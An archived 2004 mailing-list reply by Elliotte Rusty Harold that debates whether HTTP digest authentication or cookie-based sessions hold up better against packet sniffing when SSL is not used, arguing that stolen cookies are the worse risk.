[
Lists Home |
Date Index |
Thread Index
]
At 1:08 PM -0500 1/8/04, Rich Salz wrote:
>Without SSL, the risk is "offline attack on gets long-term password"
>for digest, and for cookie its "packet snarf gets limited access."
>That tradeoff alone would make the concerned (or liable) party tend
>to go for cookies, don'tcha think?
No, I don't think that's true. First of all it's not "offline attack
on gets long-term password". It's packet snarf followed by offline
attack gets long-term password. Packet snarfings are required for
both attacks.
Once the packets are snarfed, a hole that does not require any
decryption and give immediate, time limited access is worse than an
attack that requires a decryption that may not succeed. A strong
password is a pretty damn good defense against an offline, dictionary
attack on digest authentication. I don't see any equivalent action a
client can take to protect themself against a cookie based attack.
The server might be able to take a few actions to help alleviate the
problem, but in practice I doubt most server administrators are
security conscious enough to provide sufficient protection,
especially for those who aren't using SSL in the first place. *I* can
protect *myself* against your prosed attack on disgest
authentication. I cannot protect myself against the attacks on cookie
session keys. I must rely on the server to do it for me. And
excepting SSL, I don't think the defenses you propose are
sufficiently effective, even if the server does implement them. :-(
--
Elliotte Rusty Harold
elharo@metalab.unc.edu
Effective XML (Addison-Wesley, 2003)
http://www.cafeconleche.org/books/effectivexml
http://www.amazon.com/exec/obidos/ISBN%3D0321150406/ref%3Dnosim/cafeaulaitA
|
